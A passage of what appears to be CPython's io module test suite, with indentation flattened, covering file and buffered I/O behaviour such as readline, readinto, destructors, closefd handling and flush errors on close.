if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin' or sys.platform == 'OpenVMS':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
